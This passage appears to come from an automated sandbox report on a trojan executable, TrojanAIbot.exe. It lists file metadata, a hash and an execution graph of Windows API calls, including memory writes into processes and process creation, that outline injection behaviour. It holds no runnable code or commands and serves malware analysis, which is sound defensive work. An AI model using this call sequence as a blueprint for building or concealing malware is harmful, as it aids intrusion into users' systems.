                                                                                                                Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                Imagebase:0x260000
                                                                                                                File size:231'936 bytes
                                                                                                                MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:14.8%
                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                  Signature Coverage:26.7%
                                                                                                                  Total number of Nodes:1856
                                                                                                                  Total number of Limit Nodes:14
                                                                                                                  execution_graph 32408 2e8d2fc 32418 2e6656c 32408->32418 32412 2e8d32a 32423 2e8c35c timeSetEvent 32412->32423 32414 2e8d334 32415 2e8d342 GetMessageA 32414->32415 32416 2e8d352 32415->32416 32417 2e8d336 TranslateMessage DispatchMessageA 32415->32417 32417->32415 32419 2e66577 32418->32419 32424 2e64198 32419->32424 32422 2e642ac SysFreeString SysReAllocStringLen SysAllocStringLen 32422->32412 32423->32414 32425 2e641de 32424->32425 32426 2e64257 32425->32426 32427 2e643e8 32425->32427 32438 2e64130 32426->32438 32429 2e64419 32427->32429 32433 2e6442a 32427->32433 32443 2e6435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 32429->32443 32432 2e64423 32432->32433 32434 2e6446f FreeLibrary 32433->32434 32435 2e64493 32433->32435 32434->32433 32436 2e644a2 ExitProcess 32435->32436 32437 2e6449c 32435->32437 32437->32436 32439 2e64140 32438->32439 32440 2e64173 32438->32440 32439->32440 32444 2e615cc 32439->32444 32448 2e65868 32439->32448 32440->32422 32443->32432 32452 2e61560 32444->32452 32446 2e615d4 VirtualAlloc 32447 2e615eb 32446->32447 32447->32439 32449 2e65894 32448->32449 32450 2e65878 GetModuleFileNameA 32448->32450 32449->32439 32454 2e65acc GetModuleFileNameA RegOpenKeyExA 32450->32454 32453 2e61500 32452->32453 32453->32446 32455 2e65b4f 32454->32455 32456 2e65b0f RegOpenKeyExA 32454->32456 32472 2e65908 12 API calls 32455->32472 32456->32455 32457 2e65b2d RegOpenKeyExA 32456->32457 32457->32455 32459 2e65bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 32457->32459 32463 2e65cf2 32459->32463 32464 2e65c0f 32459->32464 32460 2e65b74 RegQueryValueExA 32461 2e65bb2 RegCloseKey 32460->32461 32462 2e65b94 RegQueryValueExA 32460->32462 32461->32449 32462->32461 32463->32449 32464->32463 32466 2e65c1f lstrlenA 32464->32466 32467 2e65c37 32466->32467 32467->32463 32468 2e65c84 32467->32468 32469 2e65c5c lstrcpynA LoadLibraryExA 32467->32469 32468->32463 32470 2e65c8e lstrcpynA LoadLibraryExA 32468->32470 32469->32468 32470->32463 32471 2e65cc0 lstrcpynA LoadLibraryExA 32470->32471 32471->32463 32472->32460 32473 2e8c350 32476 2e7f7c8 32473->32476 32477 2e7f7d0 32476->32477 32477->32477 32478 2e7f7d7 32477->32478 34897 2e788b8 LoadLibraryW 32478->34897 32480 2e7f7f1 34902 2e62ee0 QueryPerformanceCounter 32480->34902 32482 2e7f7f6 32483 2e7f800 InetIsOffline 32482->32483 32484 2e7f81b 32483->32484 32485 2e7f80a 32483->32485 32486 2e64530 11 API calls 32484->32486 34914 2e64530 32485->34914 32488 2e7f819 32486->32488 34905 2e64860 32488->34905 34920 2e78274 34897->34920 34899 2e788f1 34931 2e77d78 34899->34931 34903 2e62eed 34902->34903 34904 2e62ef8 GetTickCount 34902->34904 34903->32482 34904->32482 34906 2e64871 34905->34906 34907 2e64897 34906->34907 34908 2e648ae 34906->34908 34909 2e64bcc 11 API calls 34907->34909 34910 2e645a0 11 API calls 34908->34910 34911 2e648a4 34909->34911 34910->34911 34912 2e648df 34911->34912 34913 2e64530 11 API calls 34911->34913 34913->34912 34916 2e64534 34914->34916 34918 2e64544 34914->34918 34915 2e64572 34915->32488 34917 2e645a0 11 API calls 34916->34917 34916->34918 34917->34918 34918->34915 34919 2e62c2c 11 API calls 34918->34919 34919->34915 34921 2e64530 11 API calls 34920->34921 34922 2e78299 34921->34922 34945 2e7798c 34922->34945 34926 2e782b3 34927 2e782bb GetModuleHandleW GetProcAddress GetProcAddress 34926->34927 34928 2e782ee 34927->34928 34966 2e64500 34928->34966 34932 2e64530 11 API calls 34931->34932 34933 2e77d9d 34932->34933 34934 2e7798c 12 API calls 34933->34934 34935 2e77daa 34934->34935 34936 2e647ec 11 API calls 34935->34936 34937 2e77dba 34936->34937 35008 2e781cc 34937->35008 34940 2e78274 15 API calls 34941 2e77dd3 NtWriteVirtualMemory 34940->34941 34942 2e77dff 34941->34942 34943 2e64500 11 API calls 34942->34943 34944 2e77e0c FreeLibrary 34943->34944 34944->32480 34946 2e7799d 34945->34946 34970 2e64bcc 34946->34970 34948 2e77a19 34951 2e647ec 34948->34951 34949 2e779ad 34949->34948 34979 2e6babc CharNextA 34949->34979 34952 2e647f0 34951->34952 34953 2e64851 34951->34953 34954 2e64530 34952->34954 34955 2e647f8 34952->34955 34960 2e645a0 11 API calls 34954->34960 34961 2e64544 34954->34961 34955->34953 34957 2e64807 34955->34957 34959 2e64530 11 API calls 34955->34959 34956 2e64572 34956->34926 34958 2e645a0 11 API calls 34957->34958 34963 2e64821 34958->34963 34959->34957 34960->34961 34961->34956 34962 2e62c2c 11 API calls 34961->34962 34962->34956 34964 2e64530 11 API calls 34963->34964 34965 2e6484d 34964->34965 34965->34926 34967 2e64506 34966->34967 34968 2e6452c 34967->34968 34969 2e62c2c 11 API calls 34967->34969 34968->34899 34969->34967 34971 2e64bd9 34970->34971 34978 2e64c09 34970->34978 34973 2e64c02 34971->34973 34975 2e64be5 34971->34975 34981 2e645a0 34973->34981 34974 2e64bf3 34974->34949 34980 2e62c44 11 API calls 34975->34980 34986 2e644dc 34978->34986 34979->34949 34980->34974 34982 2e645a4 34981->34982 34983 2e645c8 34981->34983 34990 2e62c10 34982->34990 34983->34978 34985 2e645b1 34985->34978 34987 2e644e2 34986->34987 34989 2e644fd 34986->34989 34987->34989 34999 2e62c2c 34987->34999 34989->34974 34991 2e62c14 34990->34991 34991->34985 34992 2e62c1e 34991->34992 34993 2e62d19 34991->34993 34997 2e66520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 34991->34997 34992->34985 34998 2e62ce8 7 API calls 34993->34998 34996 2e62d3a 34996->34985 34997->34993 34998->34996 35000 2e62c3a 34999->35000 35001 2e62c30 34999->35001 35000->34989 35001->35000 35002 2e62d19 35001->35002 35006 2e66520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 35001->35006 35007 2e62ce8 7 API calls 35002->35007 35005 2e62d3a 35005->34989 35006->35002 35007->35005 35009 2e64530 11 API calls 35008->35009 35010 2e781ef 35009->35010 35011 2e7798c 12 API calls 35010->35011 35012 2e781fc 35011->35012 35013 2e78204 GetModuleHandleA 35012->35013 35014 2e78274 15 API calls 35013->35014 35015 2e78215 GetModuleHandleA 35014->35015 35016 2e78233 35015->35016 35017 2e644dc 11 API calls 35016->35017 35018 2e77dcd 35017->35018 35018->34940 35019 2e64edc 35020 2e64ee9 35019->35020 35024 2e64ef0 35019->35024 35025 2e64c38 35020->35025 35031 2e64c50 35024->35031 35026 2e64c4c 35025->35026 35027 2e64c3c SysAllocStringLen 35025->35027 35026->35024 35027->35026 35028 2e64c30 35027->35028 35029 2e64f26 SysAllocStringLen 35028->35029 35030 2e64f3c 35028->35030 35029->35028 35029->35030 35030->35024 35032 2e64c56 SysFreeString 35031->35032 35033 2e64c5c 35031->35033 35032->35033 35034 2e61c6c 35035 2e61d04 35034->35035 35036 2e61c7c 35034->35036 35039 2e61d0d 35035->35039 35040 2e61f58 35035->35040 35037 2e61cc0 35036->35037 35038 2e61c89 35036->35038 35041 2e61724 10 API calls 35037->35041 35042 2e61c94 35038->35042 35082 2e61724 35038->35082 35044 2e61e24 35039->35044 35045 2e61d25 35039->35045 35043 2e61fec 35040->35043 35047 2e61fac 35040->35047 35048 2e61f68 35040->35048 35055 2e61cd7 35041->35055 35062 2e61e55 Sleep 35044->35062 35063 2e61e7c 35044->35063 35067 2e61e95 35044->35067 35049 2e61d2c 35045->35049 35053 2e61dfc 35045->35053 35054 2e61d48 35045->35054 35050 2e61fb2 35047->35050 35056 2e61724 10 API calls 35047->35056 35051 2e61724 10 API calls 35048->35051 35066 2e61f82 35051->35066 35052 2e61724 10 API calls 35073 2e61f2c 35052->35073 35060 2e61724 10 API calls 35053->35060 35059 2e61d79 Sleep 35054->35059 35072 2e61d9c 35054->35072 35070 2e61a8c 8 API calls 35055->35070 35074 2e61cfd 35055->35074 35071 2e61fc1 35056->35071 35057 2e61ca1 35058 2e61cb9 35057->35058 35106 2e61a8c 35057->35106 35064 2e61d91 Sleep 35059->35064 35059->35072 35077 2e61e05 35060->35077 35061 2e61fa7 35062->35063 35065 2e61e6f Sleep 35062->35065 35063->35052 35063->35067 35064->35054 35065->35044 35066->35061 35075 2e61a8c 8 API calls 35066->35075 35069 2e61e1d 35070->35074 35071->35061 35078 2e61a8c 8 API calls 35071->35078 35073->35067 35076 2e61a8c 8 API calls 35073->35076 35075->35061 35079 2e61f50 35076->35079 35077->35069 35080 2e61a8c 8 API calls 35077->35080 35081 2e61fe4 35078->35081 35080->35069 35083 2e61968 35082->35083 35084 2e6173c 35082->35084 35085 2e61938 35083->35085 35086 2e61a80 35083->35086 35093 2e617cb Sleep 35084->35093 35096 2e6174e 35084->35096 35092 2e61947 Sleep 35085->35092 35099 2e61986 35085->35099 35087 2e61684 VirtualAlloc 35086->35087 35088 2e61a89 35086->35088 35090 2e616bf 35087->35090 35091 2e616af 35087->35091 35088->35057 35089 2e6175d 35089->35057 35090->35057 35123 2e61644 35091->35123 35097 2e6195d Sleep 35092->35097 35092->35099 35093->35096 35098 2e617e4 Sleep 35093->35098 35095 2e6182c 35103 2e615cc VirtualAlloc 35095->35103 35105 2e61838 35095->35105 35096->35089 35096->35095 35100 2e6180a Sleep 35096->35100 35097->35085 35098->35084 35101 2e615cc VirtualAlloc 35099->35101 35104 2e619a4 35099->35104 35100->35095 35102 2e61820 Sleep 35100->35102 35101->35104 35102->35096 35103->35105 35104->35057 35105->35057 35107 2e61aa1 35106->35107 35108 2e61b6c 35106->35108 35110 2e61aa7 35107->35110 35111 2e61b13 Sleep 35107->35111 35109 2e616e8 35108->35109 35108->35110 35114 2e61c66 35109->35114 35117 2e61644 2 API calls 35109->35117 35112 2e61b81 35110->35112 35113 2e61ab0 35110->35113 35116 2e61b4b Sleep 35110->35116 35111->35110 35115 2e61b2d Sleep 35111->35115 35121 2e61c00 VirtualFree 35112->35121 35122 2e61ba4 35112->35122 35113->35058 35114->35058 35115->35107 35116->35112 35118 2e61b61 Sleep 35116->35118 35119 2e616f5 VirtualFree 35117->35119 35118->35110 35120 2e6170d 35119->35120 35120->35058 35121->35058 35122->35058 35124 2e61681 35123->35124 35125 2e6164d 35123->35125 35124->35090 35125->35124 35126 2e6164f Sleep 35125->35126 35127 2e61664 35126->35127 35127->35124 35128 2e61668 Sleep 35127->35128 35128->35125 35129 2e83e12 35130 2e64860 11 API calls 35129->35130 35131 2e83e33 35130->35131 35132 2e83e4b 35131->35132 35133 2e647ec 11 API calls 35132->35133 35134 2e83e6a 35133->35134 35135 2e83e82 35134->35135 36675 2e789d0 35135->36675 35140 2e64860 11 API calls 35141 2e83ee0 35140->35141 35142 2e83eeb 35141->35142 35143 2e83ef7 35142->35143 35144 2e64860 11 API calls 35143->35144 35145 2e83f18 35144->35145 35146 2e83f23 35145->35146 35147 2e83f30 35146->35147 35148 2e647ec 11 API calls 35147->35148 35149 2e83f4f 35148->35149 35150 2e83f67 35149->35150 35151 2e789d0 20 API calls 35150->35151 35152 2e83f73 35151->35152 35153 2e64860 11 API calls 35152->35153 35154 2e83f94 35153->35154 35155 2e83f9f 35154->35155 35156 2e83fac 35155->35156 35157 2e647ec 11 API calls 35156->35157 35158 2e83fcb 35157->35158 35159 2e83fe3 35158->35159 35160 2e789d0 20 API calls 35159->35160 35161 2e83fef 35160->35161 35162 2e64860 11 API calls 35161->35162 35163 2e84010 35162->35163 35164 2e8401b 35163->35164 35165 2e84028 35164->35165 35166 2e647ec 11 API calls 35165->35166 35167 2e84047 35166->35167 35168 2e84052 35167->35168 35169 2e8405f 35168->35169 35170 2e789d0 20 API calls 35169->35170 35171 2e8406b 35170->35171 36695 2e7e358 35171->36695 35174 2e84091 35175 2e840a2 35174->35175 36700 2e7dc8c 35175->36700 35178 2e64860 11 API calls 35179 2e840f1 35178->35179 35180 2e840fc 35179->35180 35181 2e647ec 11 API calls 35180->35181 35182 2e84128 35181->35182 35183 2e84133 35182->35183 35184 2e789d0 20 API calls 35183->35184 35185 2e8414c 35184->35185 35186 2e64860 11 API calls 35185->35186 35187 2e8416d 35186->35187 35188 2e647ec 11 API calls 35187->35188 35189 2e841a4 35188->35189 35190 2e841af 35189->35190 35191 2e789d0 20 API calls 35190->35191 35192 2e841c8 35191->35192 35193 2e788b8 20 API calls 35192->35193 35194 2e841cd 35193->35194 35195 2e841d7 35194->35195 36715 2e7e678 35195->36715 35198 2e64860 11 API calls 35199 2e84217 35198->35199 35200 2e8422f 35199->35200 35201 2e647ec 11 API calls 35200->35201 35202 2e8424e 35201->35202 35203 2e84259 35202->35203 35204 2e789d0 20 API calls 35203->35204 35205 2e84272 Sleep 35204->35205 35206 2e64860 11 API calls 35205->35206 35207 2e8429d 35206->35207 35208 2e842b5 35207->35208 35209 2e647ec 11 API calls 35208->35209 35210 2e842d4 35209->35210 35211 2e842df 35210->35211 36854 2e646d4 35211->36854 36676 2e789e4 36675->36676 36677 2e781cc 17 API calls 36676->36677 36678 2e78a1d 36677->36678 36679 2e78274 15 API calls 36678->36679 36680 2e78a36 36679->36680 36681 2e77d78 18 API calls 36680->36681 36682 2e78a95 36681->36682 36856 2e78338 36682->36856 36685 2e78abc 36686 2e64500 11 API calls 36685->36686 36687 2e78ac9 36686->36687 36688 2e7f094 36687->36688 36689 2e7f0b9 36688->36689 36690 2e7f0e5 36689->36690 36868 2e646c4 11 API calls 36689->36868 36869 2e64530 11 API calls 36689->36869 36692 2e644dc 11 API calls 36690->36692 36693 2e7f0fa 36692->36693 36693->35140 36696 2e64bcc 11 API calls 36695->36696 36697 2e7e370 36696->36697 36698 2e7e391 36697->36698 36870 2e649f8 36697->36870 36698->35174 36701 2e7dca2 36700->36701 36876 2e64f20 36701->36876 36703 2e7dcaa 36704 2e7dcca RtlDosPathNameToNtPathName_U 36703->36704 36880 2e7dbdc 36704->36880 36706 2e7dce6 NtCreateFile 36707 2e7dd11 36706->36707 36708 2e649f8 11 API calls 36707->36708 36709 2e7dd23 NtWriteFile NtClose 36708->36709 36710 2e7dd4d 36709->36710 36881 2e64c60 36710->36881 36713 2e644dc 11 API calls 36714 2e7dd5d Sleep 36713->36714 36714->35178 36716 2e7e681 36715->36716 36716->36716 36717 2e64860 11 API calls 36716->36717 36718 2e7e6ca 36717->36718 36719 2e647ec 11 API calls 36718->36719 36720 2e7e6ef 36719->36720 36721 2e789d0 20 API calls 36720->36721 36722 2e7e70a 36721->36722 36723 2e64860 11 API calls 36722->36723 36724 2e7e723 36723->36724 36725 2e647ec 11 API calls 36724->36725 36726 2e7e748 36725->36726 36727 2e789d0 20 API calls 36726->36727 36728 2e7e763 36727->36728 36729 2e64860 11 API calls 36728->36729 36730 2e7e77c 36729->36730 36731 2e647ec 11 API calls 36730->36731 36732 2e7e7a1 36731->36732 36733 2e789d0 20 API calls 36732->36733 36734 2e7e7bc 36733->36734 36735 2e64860 11 API calls 36734->36735 36736 2e7e7ee 36735->36736 36737 2e789d0 20 API calls 36736->36737 36738 2e7e838 36737->36738 36739 2e64860 11 API calls 36738->36739 36740 2e7e86f 36739->36740 36741 2e647ec 11 API calls 36740->36741 36742 2e7e894 36741->36742 36743 2e789d0 20 API calls 36742->36743 36744 2e7e8af 36743->36744 36745 2e64860 11 API calls 36744->36745 36746 2e7e8c8 36745->36746 36747 2e647ec 11 API calls 36746->36747 36748 2e7e8ed 36747->36748 36749 2e789d0 20 API calls 36748->36749 36750 2e7e908 36749->36750 36751 2e64860 11 API calls 36750->36751 36752 2e7e921 36751->36752 36753 2e647ec 11 API calls 36752->36753 36754 2e7e946 36753->36754 36755 2e789d0 20 API calls 36754->36755 36756 2e7e961 36755->36756 36884 2e67f2c 36756->36884 36758 2e7e985 36888 2e78788 36758->36888 36761 2e64860 11 API calls 36762 2e7ea0a 36761->36762 36763 2e647ec 11 API calls 36762->36763 36764 2e7ea3b 36763->36764 36765 2e789d0 20 API calls 36764->36765 36766 2e7ea5f 36765->36766 36767 2e64860 11 API calls 36766->36767 36768 2e7ea7b 36767->36768 36769 2e647ec 11 API calls 36768->36769 36770 2e7eaac 36769->36770 36771 2e789d0 20 API calls 36770->36771 36772 2e7ead0 36771->36772 36773 2e64860 11 API calls 36772->36773 36774 2e7eaec 36773->36774 36775 2e647ec 11 API calls 36774->36775 36776 2e7eb1d 36775->36776 36777 2e789d0 20 API calls 36776->36777 36778 2e7eb41 36777->36778 36779 2e64860 11 API calls 36778->36779 36780 2e7eb5d 36779->36780 36781 2e647ec 11 API calls 36780->36781 36782 2e7eb7b 36781->36782 36900 2e7894c LoadLibraryW 36782->36900 36785 2e64860 11 API calls 36786 2e7ebac 36785->36786 36787 2e647ec 11 API calls 36786->36787 36788 2e7ebca 36787->36788 36789 2e7894c 21 API calls 36788->36789 36790 2e7ebdf 36789->36790 36791 2e64860 11 API calls 36790->36791 36792 2e7ebfb 36791->36792 36793 2e647ec 11 API calls 36792->36793 36794 2e7ec19 36793->36794 36795 2e7894c 21 API calls 36794->36795 36796 2e7ec2e 36795->36796 36797 2e64860 11 API calls 36796->36797 36798 2e7ec4a 36797->36798 36799 2e647ec 11 API calls 36798->36799 36800 2e7ec68 36799->36800 36801 2e7894c 21 API calls 36800->36801 36802 2e7ec7d 36801->36802 36803 2e7ec87 36802->36803 36804 2e7eee2 36802->36804 36805 2e64860 11 API calls 36803->36805 36806 2e64500 11 API calls 36804->36806 36810 2e7eca3 36805->36810 36807 2e7eeff 36806->36807 36808 2e64c60 SysFreeString 36807->36808 36809 2e7ef0a 36808->36809 36811 2e64500 11 API calls 36809->36811 36813 2e647ec 11 API calls 36810->36813 36812 2e7ef1a 36811->36812 36814 2e64c60 SysFreeString 36812->36814 36818 2e7ecd4 36813->36818 36815 2e7ef22 36814->36815 36816 2e64500 11 API calls 36815->36816 36817 2e7ef2f 36816->36817 36817->35198 36819 2e789d0 20 API calls 36818->36819 36820 2e7ecf8 36819->36820 36821 2e64860 11 API calls 36820->36821 36822 2e7ed14 36821->36822 36823 2e647ec 11 API calls 36822->36823 36824 2e7ed45 36823->36824 36825 2e789d0 20 API calls 36824->36825 36826 2e7ed69 WaitForSingleObject CloseHandle CloseHandle 36825->36826 36827 2e64860 11 API calls 36826->36827 36828 2e7eda0 36827->36828 36829 2e647ec 11 API calls 36828->36829 36830 2e7edbe 36829->36830 36831 2e7894c 21 API calls 36830->36831 36832 2e7edd3 36831->36832 36833 2e64860 11 API calls 36832->36833 36834 2e7edef 36833->36834 36835 2e647ec 11 API calls 36834->36835 36836 2e7ee0d 36835->36836 36837 2e7894c 21 API calls 36836->36837 36838 2e7ee22 36837->36838 36839 2e64860 11 API calls 36838->36839 36840 2e7ee3e 36839->36840 36841 2e647ec 11 API calls 36840->36841 36842 2e7ee5c 36841->36842 36843 2e7894c 21 API calls 36842->36843 36844 2e7ee71 36843->36844 36845 2e64860 11 API calls 36844->36845 36846 2e7ee8d 36845->36846 36847 2e647ec 11 API calls 36846->36847 36848 2e7eeab 36847->36848 36849 2e7894c 21 API calls 36848->36849 36850 2e7eec0 36849->36850 36851 2e7894c 21 API calls 36850->36851 36852 2e7eed1 36851->36852 36853 2e7894c 21 API calls 36852->36853 36853->36804 36855 2e646da 36854->36855 36857 2e64530 11 API calls 36856->36857 36858 2e7835b 36857->36858 36859 2e64860 11 API calls 36858->36859 36860 2e7837a 36859->36860 36861 2e781cc 17 API calls 36860->36861 36862 2e7838d 36861->36862 36863 2e78274 15 API calls 36862->36863 36864 2e78393 FlushInstructionCache 36863->36864 36865 2e783b9 36864->36865 36866 2e644dc 11 API calls 36865->36866 36867 2e783c1 FreeLibrary 36866->36867 36867->36685 36868->36689 36869->36689 36871 2e649ac 36870->36871 36872 2e649e7 36871->36872 36873 2e645a0 11 API calls 36871->36873 36872->36697 36874 2e649c3 36873->36874 36874->36872 36875 2e62c2c 11 API calls 36874->36875 36875->36872 36877 2e64f26 SysAllocStringLen 36876->36877 36878 2e64f3c 36876->36878 36877->36878 36879 2e64c30 36877->36879 36878->36703 36879->36876 36880->36706 36882 2e64c66 SysFreeString 36881->36882 36883 2e64c74 36881->36883 36882->36883 36883->36713 36885 2e67f3f 36884->36885 36907 2e64a00 36885->36907 36889 2e64530 11 API calls 36888->36889 36890 2e787ab 36889->36890 36891 2e64860 11 API calls 36890->36891 36892 2e787ca 36891->36892 36893 2e781cc 17 API calls 36892->36893 36894 2e787dd 36893->36894 36895 2e78274 15 API calls 36894->36895 36896 2e787e3 CreateProcessAsUserW 36895->36896 36897 2e78827 36896->36897 36898 2e644dc 11 API calls 36897->36898 36899 2e7882f 36898->36899 36899->36761 36901 2e78973 GetProcAddress 36900->36901 36902 2e789bb 36900->36902 36903 2e789b0 FreeLibrary 36901->36903 36904 2e7898d 36901->36904 36902->36785 36903->36902 36905 2e77d78 18 API calls 36904->36905 36906 2e789a5 36905->36906 36906->36903 36908 2e64a32 36907->36908 36910 2e64a05 36907->36910 36909 2e644dc 11 API calls 36908->36909 36913 2e64a28 36909->36913 36910->36908 36911 2e64a19 36910->36911 36914 2e645cc 36911->36914 36913->36758 36915 2e645a0 11 API calls 36914->36915 36917 2e645dc 36915->36917 36916 2e644dc 11 API calls 36918 2e645f4 36916->36918 36917->36916 36918->36913 36919 2e87074 36920 2e64860 11 API calls 36919->36920 36921 2e87095 36920->36921 36922 2e647ec 11 API calls 36921->36922 36923 2e870cc 36922->36923 36924 2e789d0 20 API calls 36923->36924 36925 2e870f0 36924->36925 36926 2e64860 11 API calls 36925->36926 36927 2e87111 36926->36927 36928 2e647ec 11 API calls 36927->36928 36929 2e87148 36928->36929 36930 2e789d0 20 API calls 36929->36930 36931 2e8716c 36930->36931 36932 2e64860 11 API calls 36931->36932 36933 2e8718d 36932->36933 36934 2e647ec 11 API calls 36933->36934 36935 2e871c4 36934->36935 36936 2e789d0 20 API calls 36935->36936 36937 2e871e8 36936->36937 36938 2e64860 11 API calls 36937->36938 36939 2e87209 36938->36939 36940 2e647ec 11 API calls 36939->36940 36941 2e87240 36940->36941 36942 2e789d0 20 API calls 36941->36942 36943 2e87264 36942->36943 36944 2e64860 11 API calls 36943->36944 36945 2e87285 36944->36945 36946 2e647ec 11 API calls 36945->36946 36947 2e872bc 36946->36947 36948 2e789d0 20 API calls 36947->36948 36949 2e872e0 36948->36949 36950 2e64860 11 API calls 36949->36950 36951 2e8731a 36950->36951 37740 2e7e0f8 36951->37740 36953 2e87349 37750 2e7f214 36953->37750 36956 2e64860 11 API calls 36957 2e87399 36956->36957 36958 2e647ec 11 API calls 36957->36958 36959 2e873d0 36958->36959 36960 2e789d0 20 API calls 36959->36960 36961 2e873f4 36960->36961 36962 2e64860 11 API calls 36961->36962 36963 2e87415 36962->36963 36964 2e647ec 11 API calls 36963->36964 36965 2e8744c 36964->36965 36966 2e789d0 20 API calls 36965->36966 36967 2e87470 36966->36967 36968 2e64860 11 API calls 36967->36968 36969 2e87491 36968->36969 36970 2e647ec 11 API calls 36969->36970 36971 2e874c8 36970->36971 36972 2e789d0 20 API calls 36971->36972 36973 2e874ec 36972->36973 36974 2e64860 11 API calls 36973->36974 36975 2e8750d 36974->36975 36976 2e647ec 11 API calls 36975->36976 36977 2e87544 36976->36977 36978 2e789d0 20 API calls 36977->36978 36979 2e87568 36978->36979 36980 2e64860 11 API calls 36979->36980 36981 2e87589 36980->36981 36982 2e647ec 11 API calls 36981->36982 36983 2e875c0 36982->36983 36984 2e789d0 20 API calls 36983->36984 36985 2e875e4 36984->36985 36986 2e64860 11 API calls 36985->36986 36987 2e87605 36986->36987 36988 2e647ec 11 API calls 36987->36988 36989 2e8763c 36988->36989 36990 2e789d0 20 API calls 36989->36990 36991 2e87660 36990->36991 36992 2e64860 11 API calls 36991->36992 36993 2e87681 36992->36993 36994 2e647ec 11 API calls 36993->36994 36995 2e876b8 36994->36995 36996 2e789d0 20 API calls 36995->36996 36997 2e876dc 36996->36997 36998 2e64860 11 API calls 36997->36998 36999 2e876fd 36998->36999 37000 2e647ec 11 API calls 36999->37000 37001 2e87734 37000->37001 37002 2e789d0 20 API calls 37001->37002 37003 2e87758 37002->37003 37004 2e64860 11 API calls 37003->37004 37005 2e87779 37004->37005 37006 2e647ec 11 API calls 37005->37006 37007 2e877b0 37006->37007 37008 2e789d0 20 API calls 37007->37008 37009 2e877d4 37008->37009 37010 2e88318 37009->37010 37011 2e877e9 37009->37011 37012 2e64860 11 API calls 37010->37012 37013 2e64860 11 API calls 37011->37013 37014 2e88339 37012->37014 37015 2e8780a 37013->37015 37016 2e647ec 11 API calls 37014->37016 37017 2e647ec 11 API calls 37015->37017 37018 2e88370 37016->37018 37019 2e87841 37017->37019 37021 2e789d0 20 API calls 37018->37021 37020 2e789d0 20 API calls 37019->37020 37022 2e87865 37020->37022 37023 2e88394 37021->37023 37024 2e64860 11 API calls 37022->37024 37025 2e64860 11 API calls 37023->37025 37027 2e87886 37024->37027 37026 2e883b5 37025->37026 37028 2e647ec 11 API calls 37026->37028 37029 2e647ec 11 API calls 37027->37029 37030 2e883ec 37028->37030 37031 2e878bd 37029->37031 37032 2e789d0 20 API calls 37030->37032 37033 2e789d0 20 API calls 37031->37033 37035 2e88410 37032->37035 37034 2e878e1 37033->37034 37036 2e64860 11 API calls 37034->37036 37037 2e64860 11 API calls 37035->37037 37039 2e87902 37036->37039 37038 2e88431 37037->37038 37040 2e647ec 11 API calls 37038->37040 37041 2e647ec 11 API calls 37039->37041 37042 2e88468 37040->37042 37043 2e87939 37041->37043 37044 2e789d0 20 API calls 37042->37044 37045 2e789d0 20 API calls 37043->37045 37046 2e8848c 37044->37046 37047 2e8795d 37045->37047 37048 2e64860 11 API calls 37046->37048 37049 2e647ec 11 API calls 37047->37049 37052 2e884ad 37048->37052 37050 2e87975 37049->37050 38167 2e785bc 37050->38167 37054 2e647ec 11 API calls 37052->37054 37056 2e884e4 37054->37056 37055 2e64860 11 API calls 37057 2e879a7 37055->37057 37058 2e789d0 20 API calls 37056->37058 37059 2e647ec 11 API calls 37057->37059 37060 2e88508 37058->37060 37063 2e879de 37059->37063 37061 2e8851d 37060->37061 37062 2e893a1 37060->37062 37065 2e64860 11 API calls 37061->37065 37064 2e64860 11 API calls 37062->37064 37066 2e789d0 20 API calls 37063->37066 37071 2e893c2 37064->37071 37067 2e8853e 37065->37067 37068 2e87a02 37066->37068 37070 2e88556 37067->37070 37069 2e64860 11 API calls 37068->37069 37075 2e87a23 37069->37075 37072 2e647ec 11 API calls 37070->37072 37073 2e647ec 11 API calls 37071->37073 37074 2e88575 37072->37074 37077 2e893f9 37073->37077 37078 2e8858d 37074->37078 37076 2e647ec 11 API calls 37075->37076 37083 2e87a5a 37076->37083 37079 2e789d0 20 API calls 37077->37079 37080 2e789d0 20 API calls 37078->37080 37081 2e8941d 37079->37081 37082 2e88599 37080->37082 37084 2e64860 11 API calls 37081->37084 37085 2e64860 11 API calls 37082->37085 37087 2e789d0 20 API calls 37083->37087 37090 2e8943e 37084->37090 37086 2e885ba 37085->37086 37091 2e885c5 37086->37091 37088 2e87a7e 37087->37088 37089 2e64860 11 API calls 37088->37089 37095 2e87a9f 37089->37095 37093 2e647ec 11 API calls 37090->37093 37092 2e647ec 11 API calls 37091->37092 37094 2e885f1 37092->37094 37097 2e89475 37093->37097 37098 2e885fc 37094->37098 37096 2e647ec 11 API calls 37095->37096 37103 2e87ad6 37096->37103 37099 2e789d0 20 API calls 37097->37099 37100 2e789d0 20 API calls 37098->37100 37101 2e89499 37099->37101 37102 2e88615 37100->37102 37104 2e64860 11 API calls 37101->37104 37105 2e64860 11 API calls 37102->37105 37106 2e789d0 20 API calls 37103->37106 37107 2e894ba 37104->37107 37108 2e88636 37105->37108 37109 2e87afa 37106->37109 37110 2e647ec 11 API calls 37107->37110 37111 2e647ec 11 API calls 37108->37111 38179 2e7adf8 29 API calls 37109->38179 37116 2e894f1 37110->37116 37115 2e8866d 37111->37115 37113 2e87b21 37114 2e64860 11 API calls 37113->37114 37120 2e87b42 37114->37120 37118 2e789d0 20 API calls 37115->37118 37117 2e789d0 20 API calls 37116->37117 37127 2e89515 37117->37127 37119 2e88691 37118->37119 37121 2e647ec 11 API calls 37119->37121 37123 2e647ec 11 API calls 37120->37123 37122 2e886bd 37121->37122 37126 2e886d5 37122->37126 37128 2e87b79 37123->37128 37124 2e89cf5 37125 2e64860 11 API calls 37124->37125 37131 2e89d16 37125->37131 37132 2e886e0 CreateProcessAsUserW 37126->37132 37127->37124 37129 2e64860 11 API calls 37127->37129 37130 2e789d0 20 API calls 37128->37130 37141 2e89560 37129->37141 37133 2e87b9d 37130->37133 37137 2e647ec 11 API calls 37131->37137 37134 2e8876e 37132->37134 37135 2e886f2 37132->37135 37136 2e64860 11 API calls 37133->37136 37138 2e64860 11 API calls 37134->37138 37139 2e64860 11 API calls 37135->37139 37146 